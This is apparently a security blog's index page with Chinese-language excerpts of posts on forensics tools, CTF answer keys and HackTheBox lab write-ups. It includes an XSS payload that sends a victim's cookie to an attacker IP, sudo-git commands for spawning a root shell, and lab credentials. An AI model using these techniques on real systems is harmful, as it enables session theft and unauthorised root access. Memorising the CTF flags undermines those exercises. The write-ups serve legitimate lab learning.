专业网址目录扫描工具用户手册
项目地址:https://github.com/benbenbendang/WebScan-Pro WebScan Pro - 专业网址目录扫描工具用户手册1. 工具概述与价值主张WebScan Pro 是一款专为安全研究人员和渗透测试工程师设计的高性能网站目录扫描工具。它采用模块化架构设计,结合了强大的多线程扫描引擎与直观的图形用户界面(GUI),旨在帮助用户快速、准确地发现目标网站的隐藏资源、未授权访问接口及敏感文件。 核心价值 高效发现:基于连接池技术的多线程并发扫描,大幅提升扫描速度。 灵活易用:同时提供专业的命令行(CLI)模式和现代化的图形界面(GUI),满足不同场景需求。 智能监控:实时可视化展示扫描进度、状态码分布及网络响应情况。 国际化支持:内置中英文双语界面,一键切换,打破语言障碍。 2. 系统要求与安装部署步骤2.1 系统环境要求 操作系统:Windows 10/11, macOS, Linux (Ubuntu/CentOS等) 运行环境:Python 3.6 及以上版本 依赖库:PyQt6, requests, rich, col...
Autopsy的使用方法
Autopsy的使用方法kali中使用方法 先在终端中启动这个程序,然后会生成一个9999端口的网站,直接点击访问 点击New Case 创建案例 因为原本是英文的,所以直接翻译了,然后这个地方案件名称、描述,调查员姓名(只填a即可)都可以随便填,看你自己, 中译一下,方便查看,直接Add Host添加主机 1. 核心设置项 Host Name(主机名): 必填项。给这台设备起个名字,比如 host1 或 target_pc。只能包含字母、数字和符号。 Description(描述): 选填。简单备注一下这台设备是什么,例如“嫌疑人的办公电脑”。 2. 时间与同步设置(对取证非常重要) Time zone(时区): 选填。如果你知道原设备所在的时区,可以在这里设置(例如 GMT+8)。这能确保你后续在 Timeline(时间线) 分析中看到的是准确的当地时间。 Timeskew Adjustment(时间偏移调整): 选填。如果原设备的系统时间比准确时间快了或慢了,你可以在这里输入秒数进行补偿(例如快了 10 秒,就填 -10)。 3. 进阶数据库(做 CTF 或常...
HTB-Imagery-WP
HTB-Imagery扫描靶机 1nmap -A -v 10.10.11.88 就两个端口,有个8000端口可以访问,把imagery.htb放到host然后访问一下 进入后可以看到右上角个注册和登录按钮,先注册然后登陆进去 有个upload按钮,可以上传图片格式的文件,先尝试上传图片 在自己的图库里面可以看到刚刚上传的图片,并且可以下载删除,但是不能传送和修改图片,估计需要admin账号,查看一下登陆框有没有xss漏洞 看来啥也没有,看一下页面,可以发现最底下有个有个Report bug的按钮 这个是用来报告图库的bug使用 测试一下有没有xss漏洞,用bp抓包,可以看到有返回请求,不断的发请求 利用xss漏洞拿到admin的cookie 1<img src=1 onerror="document.location='http://10.10.14.24/cxk/'+ document.cookie"></img> 成功的拿到了admin的cookie,然后将cookie写到后台,更新重新打开...
流量分析和Windows应急响应的部分原创题(含附件)
1.misc,先给一个压缩包伪装加密,然后提供一个图片,图片使用zsteg隐写提示文件分离的压缩包解压密码,然后解压出doro.doc,rodo.doc中藏一个图片,图片下方放入flag 解压密码:GIF_LSB_Ezflag 最终flag{Ctts_get_the_flag!!} 2.使用Windows搭建一个网站,进行应急响应 开机密码:xiaochen112233 2.流量分析应急响应—流量分析 1.hack的IP地址作为flag提交 flag{192.168.20.137} 2.hack访问的端口有哪些?从小到大排序提交,flag{xx,xx,xx,xx} flag{80,433} 3,hack找到的第一个可注入网页名称是什么? flag{shell.php} 4.hack上传的木马文件名称是什么? flag{1233.php} 5.hack的木马key是什么? flag{cmd} 6.靶机的系统版本是多少?hint:只需要写版本号即可 flag{6.1.7601} 7.hack执行的第一个命令是什么? flag{dir} 8.hack获取的开机密码是多少? flag{x...
vol2安装方法和常用命令
vol2安装方法1.在kali中拉取项目 1wget http://downloads.volatilityfoundation.org/releases/2.6/volatility_2.6_lin64_standalone.zip 2.解压文件 1unzip volatility_2.6_lin64_standalone.zip 3.赋予执行权限并重命名 为了方便使用,将其重命名为volatility并移动到/usr/bin目录下(或者直接在当前目录运行): 123cd volatility_2.6_lin64_standalonechmod +x volatility_2.6_lin64_standalonesudo mv volatility_2.6_lin64_standalone /usr/bin/vol2 4.测试运行 1vol2 -h 准备1.imageinfo //检索内存信息 2.–profile 调用系统 做题1.查看进程 //pslist hack运行了一个可疑进程,将进程名作为f...
内存取证例题(含附件)
hack入侵了小陈的网站,找到入侵痕迹将连接密钥作为flag提交 网站根目录C:\phpstudy_pro\WWW\tp5\public\upload flag{shell} 小陈的电脑注册的时候名字忘记了,找到名称,并将找到的flagc提交 注册表电脑名称 flagc{46kLNJAc} 小陈注册表被hack写入了数据flag,找到flag将其内容提交 flag{dB3ji01Z} hack启动了一个测试程序,将测试程序中的flag提交 位置:C:\Program Files (x86)\test flag{41FrJPyJ} 小陈写了一个txt文档,将文档内容提交 strings直接出 桌面F18g.txt: flag{E!z9wanO} 小陈先前学习应急响应的时候访问了一个网站,现在他忘记了,他只记得是2025年4月29号发布的文章,找到小陈访问的网站,将完整网站作为flag提价 ie访问、strings直接出 flag{http://60.204.207.36/index.php/2025/04/29/yjxy/} 小陈先前使用ftp下载了另外一台电脑上的文件,找到文件,...
对博客的后续维护
因为之前是使用WP搭建的博客系统,太臃肿加上后台不是很好用,服务器配置低,导致非常卡,卡到怀疑人生。虽然优化了很多次,但是wp的代码量在哪,所以索性直接搬家。采用静态部署,后续自己写的md文件也能直接上传后续更新频率相对来说会勤一点,但是看情况和心情吧
Git提权的两种方法
前提条件 用户需要有通过 sudo 执行 git 命令的权限。 通过 sudo -l 查看权限时,发现 git 命令在允许列表中(无需密码或可提权)。 Git提权方法方法一:利用 git help 命令 检查 sudo 权限 1sudo -l 输出中应包含类似以下内容: 12User tom may run the following commands on DC-2 as root: (root) NOPASSWD: /usr/bin/git 触发提权执行以下命令,进入 git 的帮助文档界面: 1sudo git help config 进入交互模式执行命令 按 Shift + : 进入 命令模式(类似 vi 的命令行)。 输入以下命令之一,即可获得 root 权限的 shell: 12!/bin/bash # 直接启动 root shell!'sh' # 启动 root 的 sh shell 退出帮助界面如果命令未立即生效,按 q 退出帮助界面,再执行以下命令: 1sudo git -p help ...
一键找回QQ空间的所有动态
能看到很多一起东西,希望别勾起你们的回忆 1下载地址:https://wwvs.lanzoue.com/iQD962exqsed
HTB-Rustykey-WP
HTB-Rustykey条件:rr.parker / 8#t5HE8L!W3A 扫描靶机 1nmap -A -v -T4 10.10.11.75 得到了rustykey.htb域名,写到hosts里面,使用ldap协议获得UPN信息(userPrincipalName) 将ldap里面的Users表单导出做成用户表,然后使用bh导出内网环境 1bloodhound-python -u rr.parker -p '8#t5HE8L!W3A' -d rustykey.htb -ns 10.10.11.75 -c All --zip 可以看到HELPDESK组对T-COMPUTER3.RUSTYKEY.HTB主机有Addself作用 说明这个主机可以添加到这个组里面 然后查看一下HELPDESK组,可以修改这4个用户的密码,分别是 1234BB.MORGANGG.ANDERSONDD.ALIEE.REED 除了可以修改这四个用户的密码,还对PROTECTED OBJECTS这个组有AddMember的属性 然后继续分析其他的关系,在H...









